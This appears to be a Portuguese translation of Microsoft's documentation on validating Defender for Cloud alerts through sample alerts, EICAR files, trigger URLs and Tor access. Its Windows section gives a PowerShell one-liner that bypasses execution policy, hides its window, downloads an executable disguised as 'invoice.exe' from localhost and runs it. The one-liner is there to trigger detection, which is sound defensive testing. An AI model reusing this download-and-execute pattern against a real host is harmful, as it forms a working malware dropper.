Validar alertas no Microsoft Defender para Nuvem

Este artigo explica como validar se seu sistema está configurado para Microsoft Defender para Nuvem alertas para que você possa monitorar e responder a ameaças.

O que são alertas de segurança?

Os alertas são notificações que o Defender para Nuvem gera quando detecta ameaças em seus recursos. Ela prioriza e lista os alertas, juntamente com as informações necessárias para se investigar rapidamente o problema. O Defender para Nuvem também fornece recomendações para corrigir um ataque.

Para saber mais, confira Alertas de segurança no Defender para Nuvem e Gerenciar e responder a alertas de segurança.

Pré-requisitos

Para receber todos os alertas, seus computadores e os workspaces do Log Analytics conectados precisam estar no mesmo locatário.

Gerar alertas de segurança de exemplo

Se estiver usando a nova experiência de alertas em versão prévia, conforme descrito em Gerenciar e responder a alertas de segurança no Microsoft Defender para Nuvem, você poderá criar alertas de exemplo na página de alertas de segurança no portal do Azure.

Criar alertas de exemplo

Use alertas de exemplo para:

  • Avalie o valor e os recursos de seus planos do Microsoft Defender.
  • Valide as configurações feitas para seus alertas de segurança, como integrações de SIEM (gerenciamento de eventos e informações de segurança), automação de fluxo de trabalho e notificações por email.

Para criar alertas de exemplo:

  1. Como um usuário com a função Colaborador de Assinatura, na barra de ferramentas da página de alertas de segurança, selecione Alertas de exemplo.
  2. Selecione a assinatura.
  3. Selecione os planos do Microsoft Defender relevantes para os quais você quer ver alertas.
  4. Selecione Criar alertas de exemplo.

Captura de tela mostrando as etapas para criar alertas de exemplo no Microsoft Defender para Nuvem.

Uma notificação é exibida informando que os alertas de exemplo foram criados:

Captura de tela mostrando a notificação de que os alertas de exemplo estão sendo gerados.

Após alguns minutos, os alertas aparecem na página de alertas de segurança. Eles também aparecem em qualquer outro lugar que você tenha configurado para receber alertas de segurança do Microsoft Defender para Nuvem (SIEMs conectados, notificações por email, e assim por diante).

Captura de tela mostrando os alertas de exemplo na lista de alertas de segurança.

Dica

Os alertas são para recursos simulados.

Simular alertas em suas VMs (máquinas virtuais) Azure (Windows)

Antes de começar, verifique se Microsoft Defender para Ponto de Extremidade é executado com Real-Time proteção habilitada. Para verificar essa configuração, consulte Configurar proteção em tempo real no Microsoft Defender Antivírus.

Depois que o agente de Microsoft Defender para Ponto de Extremidade for instalado em seu computador como parte da integração do Defender para Servidores, siga estas etapas no computador em que você deseja simular o recurso atacado.

Abra um prompt de linha de comando com privilégios elevados no dispositivo e execute o script:

  1. Vá para Iniciar e digite cmd.

  2. Clique com o botão direito do mouse no Prompt de Comando e selecione Executar como administrador.

    Captura de tela mostrando onde selecionar Executar como Administrador.

  3. Na solicitação, copie e execute o comando a seguir: powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\test-MDATP-test\invoice.exe');Start-Process 'C:\test-MDATP-test\invoice.exe'.

  4. A janela do prompt de comando fechará automaticamente. Se tiver êxito, um novo alerta deverá aparecer na folha Alertas do Defender para Nuvem em 10 minutos.

  5. A linha da mensagem na caixa do PowerShell deve ser semelhante à forma como ela é apresentada aqui:

    Captura de tela mostrando a linha de mensagem do PowerShell.

Como alternativa, você pode usar a cadeia de caracteres de teste EICAR para executar este teste. Crie um arquivo de texto, cole a linha EICAR e salve o arquivo como um arquivo executável na unidade local do computador.

Simular alertas em suas VMs (máquinas virtuais) Azure (Linux)

Antes de começar, verifique se Microsoft Defender para Ponto de Extremidade é executado com Real-Time proteção habilitada. Para verificar essa configuração, consulte Configurar proteção em tempo real no Microsoft Defender Antivírus.

Depois que o agente do Microsoft Defender para Ponto de Extremidade for instalado em seu computador, como parte da integração do Defender para servidores, siga estas etapas do computador onde você quer que o recurso atacado do alerta seja instalado:

  1. Abra uma janela do Terminal, copie e execute o seguinte comando: curl -O https://secure.eicar.org/eicar.com.txt
  2. A janela do prompt de comando fechará automaticamente. Se tiver êxito, um novo alerta deverá aparecer na folha Alertas do Defender para Nuvem em 10 minutos.

Simular alertas no Kubernetes

O Defender para contêineres fornece alertas de segurança para seus clusters e nós de cluster subjacentes. Defender para Contêineres monitora o plano de controle (servidor de API) e a carga de trabalho em contêineres.

Você pode simular alertas para o painel de controle e a carga de trabalho usando a ferramenta de simulação de alertas do Kubernetes.

Saiba mais sobre como defender seus nós e clusters do Kubernetes com o Microsoft Defender para contêineres.

Simular alertas para o Serviço de Aplicativo

Você pode simular alertas para recursos em execução no Serviço de Aplicativo.

  1. Crie um site e aguarde 24 horas para que ele seja registrado no Defender para Nuvem ou use um site existente.
  2. Após criar o site, acesse-o usando o seguinte URL:

    1. Abra o painel de recursos do serviço de aplicativo e copie o domínio para a URL a partir do campo de domínio padrão.

      Captura de tela mostrando onde copiar o domínio padrão.

    2. Copie o nome do site para a URL: https://<website-name>.azurewebsites.net/This_Will_Generate_ASC_Alert.

  3. Um alerta é gerado dentro de cerca de 2 a 4 horas.

Simular alertas para a ATP (Proteção Avançada contra Ameaças) de Armazenamento

Para validar a detecção de ameaças para Microsoft Defender para Armazenamento, conclua as seguintes etapas:

  1. Procure uma conta de armazenamento que tenha o Azure Defender para Armazenamento habilitado.

  2. Selecione a guia Contêineres na barra lateral.

    Captura de tela mostrando onde acessar para selecionar um contêiner.

  3. Procure um contêiner existente ou crie um.

  4. Carregue um arquivo nesse contêiner. Evite carregar qualquer arquivo que possa conter dados confidenciais.

    Captura de tela mostrando onde fazer upload de um arquivo no contêiner.

  5. Selecione com o botão direito do mouse o arquivo carregado e selecione Gerar SAS.

  6. Selecione o botão Gerar token SAS e URL (não é necessário alterar as opções).

  7. Copie o URL de SAS gerado.

  8. Abra a página de download do navegador Tor e instale o navegador Tor.

  9. No navegador Tor, navegue até a URL SAS. Agora você deve ver e pode baixar o arquivo que foi carregado.

Testar os alertas do AppServices

Para simular um alerta EICAR dos serviços de aplicativo:

  1. Localize o ponto de extremidade HTTP do site acessando a folha do portal do Azure referente ao site dos Serviços de Aplicativos ou usando a entrada DNS personalizada associada a esse site. (O endpoint de URL padrão para o site do Azure App Services tem o sufixo https://XXXXXXX.azurewebsites.net). O site deve ser um site existente e não um que foi criado antes da simulação de alerta.
  2. Localize o ponto de extremidade HTTP do site acessando a folha do portal do Azure referente ao site dos Serviços de Aplicativos ou usando a entrada de DNS personalizada associada a esse site. (O endpoint de URL padrão para o site do Azure App Services tem o sufixo https://XXXXXXX.azurewebsites.net). O site deve ser um site existente e não um que foi criado antes da simulação de alerta.
  3. Navegue até a URL do site e adicione o seguinte sufixo fixo: /This_Will_Generate_ASC_Alert. A URL deve ficar assim: https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert. Pode levar algum tempo para que o alerta seja gerado (aproximadamente 1,5 horas).

Validar a detecção de ameaças do Azure Key Vault

Para validar Azure Key Vault detecção de ameaças, conclua os pré-requisitos e siga estas etapas:

Pré-requisitos

Etapas de validação

Para validar a detecção de ameaças do Azure Key Vault:

  1. Depois de criar o Key Vault e o segredo, vá para uma VM que tenha acesso à Internet e baixe o Navegador TOR.
  2. Instale o TOR Browser em sua VM.
  3. Após a instalação, abra seu navegador regular, entre no portal do Azure e acesse a página do Key Vault. Selecione a URL realçada e copie o endereço.
  4. Abra o TOR e cole essa URL (você precisa se autenticar novamente para acessar o portal do Azure).
  5. Depois de acessar, você também poderá selecionar a opção Segredos no painel esquerdo.
  6. No Navegador TOR, saia do portal do Azure e feche o navegador.
  7. Após algum tempo, o Defender para Key Vault dispara um alerta com informações detalhadas sobre essa atividade suspeita.

Próximas etapas

Este artigo apresentou a você o processo de validação de alertas. Agora que você já conhece esse tipo de validação, explore os seguintes artigos:

  • Last updated on